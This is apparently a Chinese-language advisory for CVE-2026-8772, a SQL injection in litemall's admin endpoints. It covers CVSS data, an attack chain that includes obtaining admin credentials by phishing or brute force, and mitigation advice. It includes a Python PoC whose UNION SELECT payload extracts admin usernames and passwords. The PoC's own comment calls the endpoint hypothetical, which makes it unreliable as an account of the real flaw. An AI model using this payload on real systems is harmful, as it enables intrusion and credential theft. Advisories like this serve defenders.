CVE-2026-8772: litemall管理员端点SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-8772

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

linlinjava litemall

漏洞概述

linlinjava litemall 1.8.0及之前版本在Admin Endpoint组件中存在SQL注入漏洞。由于未对用户输入进行充分过滤，拥有高权限的攻击者可远程执行恶意SQL语句，导致数据泄露或篡改。目前利用代码已公开，厂商尚未回应。

技术细节

该漏洞存在于linlinjava litemall的Admin Endpoint组件中，影响多个端点。漏洞成因是系统在处理特定管理请求时，未对参数进行严格的SQL语法过滤，导致攻击者能够注入恶意SQL代码。根据CVSS 3.1向量，攻击复杂度低（AC:L），但需要高权限（PR:H），意味着攻击者必须具备管理员账户。攻击者通过网络（AV:N）发送特制数据包，利用UNION查询或布尔盲注等技术，绕过验证执行数据库操作。成功利用可导致机密性、完整性和可用性受到低程度影响。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统运行的是linlinjava litemall，且版本在1.8.0及以下。

STEP 2

步骤2：获取权限

由于漏洞需要高权限（PR:H），攻击者通过钓鱼、弱口令爆破或其他漏洞获取管理员账户凭证。

STEP 3

步骤3：构造Payload

攻击者针对Admin Endpoint组件的受影响接口，构造包含SQL注入语句的恶意HTTP请求参数。

STEP 4

步骤4：执行攻击

利用管理员Token发送请求，后端数据库执行恶意SQL语句，导致敏感数据泄露或篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: litemall <= 1.8.0 Admin Endpoint SQL Injection PoC
# Date: 2026-05-18
# Exploit Author: Analyst
# Vendor Homepage: https://github.com/linlinjava/litemall
# Version: <= 1.8.0

def exploit_sqli(target_url, admin_token):
    """
    Demonstrates SQL injection in an affected Admin Endpoint.
    Note: Requires High Privileges (Admin Token).
    """
    headers = {
        "X-Litemall-Admin-Token": admin_token,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }
    
    # Example vulnerable endpoint parameter (hypothetical based on description)
    # Attacker manipulates 'id' or 'order' parameter
    payload = "1' UNION SELECT NULL, username, password, NULL FROM litemall_admin-- -"
    
    params = {
        "id": payload
    }
    
    vuln_url = f"{target_url}/admin/goods/list"
    
    try:
        response = requests.get(vuln_url, headers=headers, params=params, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Check response content for potential data leakage.")
            # print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target and valid admin token
    target = "http://127.0.0.1:8080"
    token = "<VALID_ADMIN_TOKEN>"
    exploit_sqli(target, token)

影响范围

linlinjava litemall <= 1.8.0

防御指南

临时缓解措施

由于厂商尚未响应，建议立即限制管理员后台的公网访问，仅允许通过VPN或内网访问。同时，在WAF中添加针对特定Admin Endpoint参数的SQL注入检测规则，阻断包含单引号、UNION SELECT等特征的请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8772
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8772
3 Details https://www.cvedetails.com/cve/CVE-2026-8772/
4 VulDB https://vuldb.com/cve/CVE-2026-8772
5 Link https://gist.github.com/A1AAAAAAAAAA1/bc875f5be52b44b2e557c5312e355d47
6 Link https://vuldb.com/submit/811468
7 Link https://vuldb.com/vuln/364397
8 Link https://vuldb.com/vuln/364397/cti